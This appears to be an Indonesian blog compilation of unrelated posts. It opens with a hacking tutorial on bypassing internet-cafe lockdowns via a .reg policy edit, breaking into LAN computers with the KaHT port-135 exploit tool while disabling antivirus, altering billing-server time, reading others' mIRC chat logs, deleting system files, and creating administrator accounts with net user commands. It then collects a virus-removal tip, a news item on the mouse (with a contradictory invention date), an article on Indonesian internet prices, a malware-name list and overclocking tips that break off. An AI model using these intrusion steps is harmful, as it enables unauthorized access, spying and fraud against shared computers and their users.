2. Cara masuk ke DOS pada Windows XP yang serba dikunci Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini Gue punya jawaban Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya : 1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties 2. Di properties pilihlah “find target…” 3. Muncul Window lalu pilih search diatas 4. Pada Search pilihlah “All Files and folders” 5. Lalu cari file “cmd.exe” di windows 6. Jika di temukan maka jalankan file cmd.exe. 7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos Jika ternyata penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut, cara untuk membuatnya ada dihalaman ini juga. Tujuan dari tutorial ini agar kita dapat lebih banyak bergerak leluasa diwarnet-warnet yang keamanannya terlalu dilindungi sehingga membuat kita tidak bisa berbuat banyak di komputer tersebut.

3. Menembus fasilitas umum windows yang terlalu dibatasi Menjengkelkan jika fasilitas MS-DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu BT, kita tembus aja pakek cara ini 1. Masuk ke Notepad / Wordpad / Ms Word 2.Laluketik dibawah ini REGEDIT4 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""System] “DisableRegistryTools”=dword:00000001 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""Explorer] “NoRun”=dword:00000000 3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan. 4. Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini. 1.Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) … Download Interenet Maniac Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname KaHT (KaHt.exe) … Download program hacker KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan. Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja) Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program Internet Maniac Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode Untuk Windows XP : Masuklah ke Start, All programs, Accessories lalu Command Prompt Untuk Windows 95/98/Me/NT/2000 Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\”"KaH) maka ketikkan “CD\”"KaHT” dan seterusnya. Jika sudah, ini saatnya? Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini : “KaHT Ip1 ip2? ip1 : ip awal yang discan ip2 : ip terahkir yang discan Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1? lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di “c:\”"windows\”"system” milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi : Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe. Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\”"Program Files\”"MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\”"program Files\”"MiRC program MiRCnya maka cukup masuk aja di C:\”"Program Files\”"MiRC\”"Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan. Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab.. 5.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup ASdministrators Guest /add Membuat akses adminstrator sendiri :

1. Ketik : net user /add

2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete 1. Cara mengetahui password administrator Windows – Download Proactive Windows Security Explorer

sumber: http://www.scribd.com/

topik penanganan virus yg merusak file *.DOC menjadi *.EXE

dengan topik penanganan virus yg merusak file *.DOC menjadi
*.EXE
-----------------------------------------------------------------
Induk virus ini namanya kspoold.exe yang berada di %SYSTEMROOT%System32

Teinstal sebagai service windows dengan nama "K Print Spooler"

Dia memakan file DOC yang ada di removable drive, dan dia akan memuntahkan file DOC
bila file EXE (DOC yang terinfeksi) dimasukkan ke dalam harddrive.

Untuk membasminya:

1. Klik kanan my computer, pilih "manage"
2. Masuk ke "Services And Applications" -> "Services"
3. Pilih "K Print Spooler" pada listview sebelah kanan
4. Double click pada "K Print Spooler"
5. Masuk ke tab "Logon"
6. Klik pada option "This Account"
7. Ketikkan ".Guest"
8. Hapus / kosongkan passwordnya
9. Klik tombol "Disable"
10. Klik Apply
11. Bila ada peringatan, klik OK
12. Masuk tab "General"
13. Klik tombol "Stop"
14. Klik OK
15. Tutup "Computer Management"

Mouse Akan Punah

Mouse Akan Punah Sebentar Lagi?

Usianya mendekati 40 tahun. Kini, dia sedang sekarat dan menanti ajal. Peran pentingnya selama ini tinggal ada dalam kenangan. Dalam 3-5 tahun mendatang, orang-orang akan melupakannya.

Namanya mouse. Hingga kini, dia masih jadi piranti penting dalam teknologi komputer. Tapi, menurut Steve Prentice, analis dari Gartner, mouse akan punah dalam waktu tak lama lagi.

Mouse, pada akhirnya, bakal tergilas oleh perkembangan teknologi baru, terutama dalam industri teknologi informasi (TI). Teknologi mouse akan digantikan dengan beberapa mekanisme baru seperti layar sentuh dan alat pengenal wajah.

Menurutnya, mouse mungkin masih bisa digunakan dalam lingkungan desktop. ”Namun untuk hiburan rumah dan notebook, tidak lagi,” ujarnya.

Prediksi yang dibuat Prentice cukup beralasan. Pasalnya, banyak perusahaan berbasis TI yang berinovasi, mengikuti kebutuhan dan selera konsumen. Beberapa dari invasi ini, terinspirasi dari dunia game, misalnya game Guitar Hero yang dianggap paling inovatif saat ini. Pemain tidak memerlukan alat pengendali, cukup berdiri saja di depan layar dan layar akan mengenali semua gerakan.

Selain itu, peralatan tersebut juga mengenali wajah seseorang dan menampilkannya di layar TV. Selanjutnya, tinggal menggerakkan tangan untuk memilih tampilan dari menu.

Panasonic sudah berinovasi dengan teknologi ini. Sony, Canon, dan beberapa pabrikan video serta fotografi juga menyusul. Mereka bahkan ingin membuat peralatan yang mengenali wajah dalam format real time. “Bahkan mengenali ketika Anda tersenyum,” imbuh Prentice.

Kecanggihan tersebut belum semuanya. Masyarakat masih akan dimanja dengan hadirnya sebuah sistem pada bulan September. Sistem itu terdiri dari sebuah headset dan dikendalikan dengan sebuah komputer.

Untuk mengendalikan alat ini, yang perlu dilakukan hanyalah berpikir untuk memerintahkan komputer bekerja. Prentice mengatakan, semua teknologi ini pada dasarnya menggunakan komputer untuk melakukan hal-hal yang lebih pintar.

Namun, Rory Dooley, Wakil Presiden dan General Manager Logitech yang membuat alat pengendali mengatakan hal yang sebaliknya. Kendati banyak yang berpikir mouse akan ditinggalkan, menurutnya berbagai pihak membesar-besarkan masalah ini. “Tidak akan seperti itu. Mereka terlalu berlebihan,” tandasnya.

Logitech adalah pembuat mouse dan keyboard terbesar di dunia. Selama 20 tahun terakhir, mereka telah menjual lebih dari 500 juta unit mouse ke seluruh dunia. Perusahaan ini memang tidak ketinggalan dengan berbagai macam inovasi dalam berinteraksi dengan komputer.

Tetapi, lanjut Dooley, melihat penjualan mouse mereka, peran mouse masih penting dalam sebuah perangkat komputer. Terutama karena dunia telah memasuki era konvergensi. “Sekarang TV bekerja seperti komputer dan begitu pula sebaliknya,” ujarnya.

Berbagai peralatan canggih hadir terus-menerus. Kebanyakan dari mereka merupakan hasil modifikasi yang mengikuit perkembangan gaya hidup manusia. Dooley berpendapat apapun itu, tidak mengurangi nilai mouse.

Mouse adalah alat yang digunakan untuk memasukkan data ke dalam komputer, selain papan ketik. Nama mouse digunakan karena bentuknya yang seperti seekor tikus. Pertama kali dibuat pada tahun 1963 oleh Douglas Engelbart dari kayu dengan satu tombol. Model kedua sudah dilengkapi dengan 3 tombol. Engelbart menemukan mouse ketika bekerja untuk Stanford Research Institute pada tahun 1987. Ia tidak pernah mendapatkan royalti atas penemuannya ini kendati ia mematenkannya. Sebab teknologi PC ketika itu belum membutuhkannya.

Mouse bekerja dengan menangkap gerakan menggunakan bola yang menyentuh permukaan keras dan rata. Mouse yang lebih modern sudah tidak menggunakan bola lagi, tetapi menggunakan sinar optikal untuk mendeteksi gerakan. Selain itu, ada pula yang sudah menggunakan teknologi nirkabel, baik yang berbasis radio, sinar inframerah, maupun bluetooth.

Saat ini, teknologi terbaru sudah memungkinkan mouse memakai sistem laser sehingga resolusinya dapat mencapai 2.000 titik per inci (dpi), bahkan ada yang bisa mencapai 4.800 titik per inci. Biasanya mouse semacam ini diperuntukkan bagi penggemar permainan video. Memasuki usianya yang ke-40, akan ada semacam perayaan yang dipersembahkan oleh Logitech.

Koneksi Indonesia Paling Mahal dan Lelet di Asia Bahkan di Dunia

Emang ne Indon belom bisa kasih kpuasan ama kita2 pelanggannya
dsadur dari:
http://ketok.com/index.php?news_id=3...ear=&arcmonth=

Layanan internet (broadband) di Indonesia adalah salah satu yang terburuk di dunia, bahkan di Asia. Tingginya tarif internet belumlah sebanding dengan layanan, yaitu kecepatan akses data yang memuaskan.

Demikian diungkapkan Ketua Lembaga Riset Sharing Vision Dimitri Mahayana di Bandung, Minggu (1/2).

"Tarif internet di Indonesia itu 300 kali lebih mahal daripada di Jepang. Di sana, tarif layanan termurah dilepas di USD 0,13 per megabit/detik. Di tempat kita, yang paling murah Fastnet, ada di USD 15 per megabit/detik," tutur dosen Teknik Elektro Institut Teknologi Bandung ini mengutip data dari riset OECD (Organisation for Economic Co-Operation and Development.

Rata-rata di Indonesia, tarif layanan internet adalah USD 50 (Rp 550.000 per megabit/detik. Yang jadi masalah, kecepatan akses rata-rata di Indonesia 256 kilobit per detik. Sementara, kecepatan akses di Jepang mencapai 93. 693 kilobit/detik. Maka, dari hasil survei Sharing Vision, kondisi ini mengakibatkan tingkat kepuasan dan ketertarikan berlangganan internet menurun. Dari 84 persen menjadi 66 persen di tahun berikutnya.

"Kalau lambat dan mahal seperti ini ya repot. Ibaratnya dengan negara lain, kita naik sepeda mereka naik Rolls-Royce. Padahal, banyak hal dan ilmu yang bisa kita dapat dari internet," tuturnya.

Minimnya konten dalam negeri dan lemahnya infrastruktur, yaitu jaringan backbone di Indonesia adalah beberapa penyebab buruknya layanan internet di negara kita. (kompas)

Ini Dia Daftar 100 Malware Terganas

Serangan malware kian menggila. Ada begitu banyak jenis malware yang mengintai dan siap menyerang pengguna komputer.

Berikut daftar nama-nama malware terganas yang beredar di Indonesia periode 18 Juni 2009-25 Juni 2009, menurut laporan Kaspersky Lab, yang dikutip detikINET, Jumat (26/6/2009):

1. Net-Worm.Win32.Kido.ih ( 41.9714%)
2. Exploit.Win32.SqlShell.a (9.7527%)
3. HEUR:Trojan.Win32.Generic (7.6628%)
4. Heur.Win32.Trojan.Generic (3.309%)
5. Trojan.Win32.FraudPack.owo (3.1%)
6. Trojan-Downloader.Win32.Agent.cgns (2.5427%)
7. Trojan.Win32.Agent.cltm (1.846%)
8. Trojan.Win32.FraudPack.oxv (1.7416%)
9. Trojan-Dropper.Win32.Small.axv (1.5674%)
10. Trojan.Win32.FraudPack.ovx (1.5674%)
11. Trojan-PSW.Win32.Agent.nfo (1.3236%)
12. Trojan.Win32.Buzus.bhqc (1.2539%)
13. Trojan.Win32.Agent2.kov (1.1494%)
14. Net-Worm.Win32.Kido.dam.y (1.1146%)
15. Heur.Win32.Invader (0.8708%)
16. Net-Worm.Win32.Kido.eo (0.8011%)
17. Trojan.Win32.Monder.cmwt (0.8011%)
18. Trojan-GameThief.Win32.Magania.bfru (0.7315%)
19. Trojan-Downloader.Win32.Agent.ansh (0.6618%)
20. Trojan-Dropper.Win32.Agent.zje (0.5921%
21. Trojan-Downloader.Win32.Agent.cgew (0.5921%)
22. Trojan-Downloader.Win32.Agent.wxq (0.5573%)
23. not-a-virus:Porn-Dialer.Win32.InstantAccess.f(0.5573%)
24. Trojan-GameThief.Win32.Magania.bfrp (0.5225%)
25. Trojan-Downloader.Win32.Small.jvl (0.5225%)
26. Net-Worm.Win32.Koobface.d (0.4528%)
27. Trojan-Downloader.Win32.Injecter.cqd (0.418%)
28. HEUR:Trojan-Downloader.Win32.Generic (0.3831%)
29. Virus.Win32.Sality.aa (0.3135%)
30. not-a-virus:AdWare.Win32.Relevant.n (0.3135%)
31. Trojan-GameThief.Win32.Magania.bfdq ( 0.2786%)
32. not-a-virus:AdWare.Win32.Agent.lmz (0.2786%)
33. not-a-virus:AdWare.Win32.Shopper.l (0.209%)
34. Trojan-GameThief.Win32.Magania.bful (0.209%)
35. Trojan-GameThief.Win32.WOW.bie (0.209%)
36. not-a-virus:WebToolbar.Win32.FenomenGame.pxu (0.1742%)
37. Trojan-Dropper.Win32.Small.dhn (0.1742%)
38. Exploit.Win32.DCom.ad
39. Trojan-GameThief.Win32.Magania.bffe (0.1742%)
40. Trojan-GameThief.Win32.Magania.bfws (0.1742%)
41. Trojan-Banker.Win32.Banker.aifb (0.1742%)
42. Packed.Win32.Black.d (0.1742%)
43. Trojan.Win32.Agent.cgof (0.1393%)
44. Trojan-Dropper.Win32.Small.ayg (0.1393%)
45. Trojan-Downloader.Win32.FraudLoad.wcby (0.1393%)
46. Trojan-Downloader.Win32.Small.jwq ( 0.1393%)
47. Trojan-GameThief.Win32.OnLineGames.bktw ( 0.1393%)
48. MultiPacked.Multi.Generic (0.1393%)
49. HEUR:Backdoor.Win32.Generic (0.1045%
50. Suspicious.Win32.Packer (0.1045%)
51. Virus.Win32.Virut.ce (0.1045%)
52. Backdoor.Win32.IEbooot.dfe (0.1045%)
53. Trojan-Downloader.Win32.FraudLoad.erj ( 0.1045%)
54. Trojan-Dropper.Win32.Agent.atvx (0.1045%)
55. Backdoor.Win32.Agent.ahwn (0.1045%)
56. Multi.Win32.Packed (0.1045%)
57. HEUR:Trojan.Win32.Invader (0.1045%)
58. Trojan.Win32.Agent.abud (0.1045%)
59. Backdoor.Win32.Poison.ahgc (0.1045%)
60. Trojan-GameThief.Win32.Magania.bfsy (0.1045%)
61. Trojan-Downloader.Win32.Agent.cdid ( 0.1045%)
62. Trojan.Win32.Stuh.pdm (0.1045%)
63. Trojan.Win32.Buzus.bigq (0.1045%)
64. Backdoor.Win32.Small.icr (0.1045%)
65. Backdoor.Win32.Agent.ahgv (0.1045%)
66. Trojan.Win32.Agent.cngn (0.1045%)
67. Backdoor.Win32.Hupigon.aovn (0.1045%)
68. Trojan-Dropper.Win32.Agent.atmg ( 0.1045%)
69. Packed.Win32.Black.a (0.1045%)
70. HackTool.MSIL.KKFinder.q (0.0697%)
71. Trojan-Downloader.Win32.Small.aliy (0.0697%)
72. not-a-virus:AdWare.Win32.Webdir.e (0.0697%)
73. Email-Worm.Win32.Joleee.bwu (0.0697%)
74. HEUR:Virus.Win32.Generic (0.0697%)
75. Trojan-Dropper.Win32.Small.cdw (0.0697%)
76. Trojan.Win32.Agent.cccr (0.0697%)
77. Trojan.Win32.Midgare.mqa (0.0697%)
78. Backdoor.Win32.Bifrose.aknz (0.0697%)
79. Trojan.Win32.Agent.cmud (0.0697%)
80. not-a-virus:AdWare.Win32.Shopper.v (0.0697%)
81. Backdoor.Win32.Bifrose.fpb (0.0697%)
82. Trojan-Mailfinder.Win32.Mailbot.ec
83. Trojan.Win32.Agent.cjxh (0.0697%)
84. Trojan-Spy.Win32.Zbot.xdj (0.0697%)
85. P2P-Worm.Win32.Archivarius.b (0.0697%)
86. Virus.Win32.Sality.z (0.0697%)
87. HEUR:Worm.Win32.Generic (0.0697%)
88. Trojan-Dropper.Win32.Mudrop.ask (0.0697%)
89. Trojan.Win32.Agent2.hxw (0.0697%)
90. Trojan.Win32.Agent.cmnr (0.0697%)
91. Trojan.Win32.Agent.rzw (0.0697%)
92. Trojan-Downloader.Win32.FraudLoad.eki (0.0697%)
93. Trojan-Downloader.JS.Agent.gj (0.0697%)
94. not-a-virus:AdWare.Win32.AlexaBar.n (0.0697%)
95. Trojan.Win32.KillWin.pi (0.0697%)
96. not-a-virus:AdWare.Win32.Chiem.c (0.0697%)
97. Net-Worm.Win32.Kido.cy
98. Trojan-Downloader.Win32.Agent.cgaw(0.0348%)
99. Trojan-Dropper.Win32.Mudrop.aso (0.0348%)
100. Packed.Win32.Krap.c (0.0348%)

Info Dan Tips Seputar Overclock

Melakukan Overclock

1. Pastikan stabil di awal
Anda harus memastikan sistem stabil pada kondisi awal atau default. Ini untuk memastikan tidak ada komponen yang bermasalah sejak awal.

2. Satu-satu
Supaya mudah mencari sumber masalah, sebaiknya cari setting maksimal dari tiap komponen satu per satu. Ketika mencari setting maksimal prosesor, biarkan memori dan kartu grafis pada kondisi normal. Jika sudah ketemu, baru cari setting maksimal memori dan kartu grafis.

3. Naikkan sedikit dulu
Jangan terburu nafsu menaikkan frekuensi prosesor, memori, dan kartu grafis. Naikkan per 10 Mhz, lihat temperaturnya, lalu pastikan kestabilannya. Jika sudah yakin stabil, baru naikkan lagi.

Sisi Negatif Overclock

Meskipun proses overclock terasa menggoda, ada beberapa hal yang harus Anda pertimbangkan. Beberapa diantaranya adalah:

1. Overclock menghilangkan garansi
Proses overclock selalu berpotensi merusak komponen, dan masalahnya, tidak ada pembuat prosesor/memori/kartu grafis yang memasukkan overclock ke dalam jaminan garansi. Jadi jika rusak, ya tidak bisa diganti (kecuali Anda bisa membohongi Produsen tersebut soal alasan komponennya rusak)

2. Peningkatan kinerja tidak sebanding
Anda habiskan uang berjuta-juta untuk membeli motherboard bagus, PSU mahal, bahkan pendingin berbasis cairan, namun peningkatan kinerja tidak signifikan. Bahkan jika dihitung-hitung, prosesor bagus yang dikombinasikan dengan motherboard standar justru memberi kinerja yang lebih bagus dan lebih murah. Resiko ini selalu bisa terjadi, jadi lebih baik jangan terburu nafsu.

3. Komponen cepat rusak
Tidak ada penelitian khusus yang mendukung anggapan itu, namun komponen yang dipaksa bekerja lebih keras memang memiliki resiko lebih cepat rusak. Namun penurunan umum pakainya hanya sekitar 10-20%, dan kalaupun rusak, biasanya komponen itu memang sudah ketinggalan jaman dan sudah waktunya diganti.

Terus ada beberapa informasi yang berguna nih...

Prosesor

Sekedar mengingatkan, kecepatan prosesor adalah hasil perkalian multiplier dengan frekuensi FSB. Misalnya prosesor Intel Core 2 Duo Q6600 yang kecepatannya 2,4GHz, memiliki multiplier 9 dengan FSB 266MHz (9x266=2,394 GHz). Jadi untuk meningkatkan kecepatan prosesor, parameter yang bisa kita ubah adalah multiplier dan frekuensi FSB. Sayangnya prosesor sekarang sebagian besar sudah dikunci multipliernya. Ada sih yang tidak dikunci, namun cuma untuk prosesor kelas premium seperti Intel Core 2 Extreme, atau AMD FX, Black Edition. Jadi selain prosesor tersebut, kita cuma bisa mengubah frekuensi FSB.

Namun perlu dicatat, nilai FSB tidak cuma berkaitan dengan prosesor, namun juga motherboar dan memori. Jadi perubahan FSB akan berpengaruh ke motherboard dan memori (dan di sinilah peran motherboard dan memori yang berkualitas menjadi penting).

Bagaimana caranya menaikkan frekuensi prosesor? Mudah saja, yaitu melalui BIOS. Belakangan ada juga aplikasi yang berfungsi mengubah FSB dan berjalan di Windows, sehingga kita tidak perlu masuk BIOS untuk melakukan proses tweaking. Contohnya adalah SetFSB atau aplikasi khusus dari produsen motherboard seperti Asus Ai Tuner atau Gigabyte Easy Tune. Namun, pergantian via BIOS masih lebih akurat.

Menu untuk mengganti frekuensi letaknya beragam, namun biasanya ada di menu Advanced Setting atau sejenisnya. Biasanya Anda harus mengubah dulu setting prosesor ke manual supaya menu frekuensi bisa diubah-ubah. Nah, tinggal ubah saja frekuensinya. Tentunya tidak membabi buta. Naikkan 5-10MHz dulu, lalu uji kestabilannya dengan masuk Windows dan menjalankan aplikasi berat. Jika lolos uji kestabilan, Anda bisa masuk BIOS lagi dan naikkan frekuensinya per 5-10MHz lagi. Setelah itu uji lagi kestabilannya. Lakukan siklus itu berulang-ulang sampai sistem menjadi tidak stabil (restart atau hang).

Jika sudah tidak stabil, berarti sudah mentok? Tidak juga. Kemampuan prosesor bisa ditingkatkan lagi jika kita memberi 'doping' berupa penambahan voltase. Namun namanya juga 'doping', pemberian voltase tidak boleh berlebihan yang justru akan merusak prosesor.

Hal lain yang harus diperhatikan adalah panas. Sama seperti pelari, ketika disuruh berlari leih cepat maka ia akan mengeluarkan panas yang lebih tinggi. Jika panasnya di atas batas yang bisa ditanggung, maka prosesor pun menjadi tidak stabil. Solusinya adalah menggunakan sistem pendingin yang lebih serius, seperti menggunakan kipas yang lebih besar dan kencang. Cara yang lebih ekstrem adalah menggunakan pendingin berbasis cairan (water cooling) atau menggunakan es kering (dry ice) seperti yang sering Anda lihat di lomba overclock.

Jika doping voltase sudah dilakukan, sistem pendingin pun sudah maksimal, dan prosesor tetap tidak stabil, maka itu adalah frekuensi maksimal yang bisa dicapai prosesor. Ketika itu terjadi, langkah selanjutnya adalah melakukan overclock pada komponen lain.

Memori

Kecepatan memori ditentukan oleh dua parameter, yaitu frekuensi dan timing. Definisi frekuensi memori sama seperti prosesor, yaitu banyaknya pekerjaan yang dilakukan per detiknya. Sedangkan timing adalah kecepatan membaca/menulis data di dalam memori (yang tersusun dalam kolom dan baris). Ada banyak parameter yang menentukan timing, namun yang paling penting adalah Cas Latency (Cas atau CL), Ras-to-Cas Delay (tRCD), tRP (Ras Precharge), tRAS (active to precharge delay), dan CMD (Command Rate). Semakin kecil timing semakin cepat memori.

Frekuensi dan timing memori sudah di setting dari sananya oleh pabrikan memori. Untuk timing disusun dengan urutan CAS-tRCD-tRP-tRAS-CMD. Jadi jika Anda melihat memori mencantumkan deretan angka 3-3-3-5-2T, berarti memori itu memiliki CAS Latency 3, RAS-to-CAS Delay 3, dan seterusnya.

Namun timing dan frekuensi memiliki hubungan terbalik. Ketika timing diperketat, frekuensi tidak bisa dipaksa bekerja tinggi. Sebaliknya, ketika frekuensi tinggi, timing harus longgar. Hanya pada memori kelas atas (dan mahal) saja kita bisa mendapatkan timing ketat yang dibarengi frekuensi tinggi.

Jadi pada proses overclock, metode untuk meningkatkan kecepatan ada dua: memperketat timing atau meningkatkan frekuensi. Mana yang sebaliknya dipilih? Tergantung prosesor yang Anda gunakan. Sistem kerja prosesor AMD lebih cocok dengan timing ketat, semestara prosesor Intel lebih memilih frekuensi tinggi meski berarti timing yang longgar.

Ambil contoh jika Anda menggunakan prosesor Intel yang dipadankan memori DDR2 800MHz dengan timing 5-5-5-15-1T. Ketika frekuensi memori ditingkatkan menjadi 1000MHz, sistem tidak stabil. Pada kasus ini, Anda bisa longgarkan timing menjadi 7-7-7-18-2T. Ketika timing dilonggarkan, memori lebih fleksibel untuk ditingkatkan frekuensinya.

Timing dan frekuensi memori dilakukan di dalam BIOS, biasanya di bawah menu Advanced Setting. Ada pula program bantu seperti MemSet yang bisa mengubah frekuensi dan timing memori di dalam Windows.

Namun perlu dicatat mengubah frekuensi memori tidak sebebas mengubah frekuensi prosesor. Biasanya pilihan yang tersedia memiliki perbandingan atau rasio khusus dengan FSB, seperti 1:1, 1:2 atau 1:4. Ambil contoh pada motherboard Asus Maximus Formula, jika FSB yang digunakan 266MHz, frekuensi memori yang tersedia adalah 533MHz (1:2), 667MHz (2:5), 800MHz (1:3), dan 4 pilihan lainnya. Menu ini termasuk lengkap karena biasanya di motherboard lain cuma tersedia 3-4 rasio saja.

Sama seperti prosesor, memori juga bisa diberi doping melalui peningkatan rendah. Untuk memori grafis, pada VGA seri mainstream, kecepatan memori grafis masih bisa dinaikkan frekuensinya sebanyak 25 persen dengan aman. Tetapi untuk VGA high end, biasanya dibawah itu. Pasalnya, clock speed memory VGA high end juga sudah dimaksimalkan dari pabriknya.

Bila sudah didapatkan clock speed optimal (kondisi teroverclock tetapi masih tetap stabil untuk memainkan game atau menjalankan software benchmark 3D tanpa artifak), menggunakan software overclock VGA tersebut Anda bisa menyimpan settingnya agar selalu di-load ketika memulai sistem operasi. Atau Anda juga bisa membuatnya permanen dengan mengubah informasi clock speed core dan memory VGA di BIOS VGA tersebut menggunakan software BIOS editor. Tetapi ingat, awas panas. Pada proses overclock, peran motherboard adalah vital. Pasalnya, pada BIOS motherboard-lah semua setting untuk meningkatkan kerja prosesor dan memori tersedia. Karena itu, penting untuk memilih motherboard yang memiliki menu BIOS yang lengkap. Setidaknya tersedia pilihan untuk mengganti frekuensi, timing, dan voltase memori. Motherboard yang baik untuk overclock juga memisahkan FSB tidak berpengaruh frekuensi lain.

Tidak cuma menu, secara hardware pun motherboard harus tangguh untuk di overclock. Ada banyak faktor yang menentukan kemampuan overclock sebuah motherboard, mulai dari kemampuan menyediakan arus dan voltase yang bersih sampai penggunaan kapasitor dan Mosfet berkualitas. Sistem pendingin chipset juga berpengaruh, karena proses overclock akan meningkatkan panas chipset. Sayangnya tidak ada cara singkat untuk mengetahui kemampuan overclock sebuah motherboard.

Pada proses overclock, bagian paling penting dari motherboard adalah northbridge. sekedar mengingatkan, chipset northbridge sistem Intel adalah tempat memory controller, jadi perubahan FSB dan frekuensi memori akan berpengaruh di chipset ini. Ketika FSB dinaikkan, kerja chipset juga meningkat; panas pun tambah tinggi (itulah sebabnya sistem pendingin chipset menjadi penting). Pada beberapa motherboard, kerja northbridge bisa dipompa dengan melakukan doping voltase. Namun itu berarti panas chipset harus lebih diperhatikan lagi.

Sistem Pendingin

Seperti disebutkan di atas, panas adalah musuh utama setiap komponen yang di-overclock. Sebaiknya ganti pendingin standar prosesor dengan pendingin yang lebih besar, apalagi Jika Anda sudah menaikkan voltase prosesor. Kalau perlu, gunakan pendingin yang lebih ekstrim seperti water cooling. Apalagi belakangan ada Water-cooler all-in-one seperti Cooler Master Aquagate 1. Water-cooler ini sudah memuat pompa dan cairan dalam paket yang mudah dipasang di dalam casing. Dan jangan lupa gunakan thermal paste berkualitas bagus pada badan prosesor sebelum ditempelkan pada heatsink.

Tips Untuk OverClock :

1. PENDINGINAN
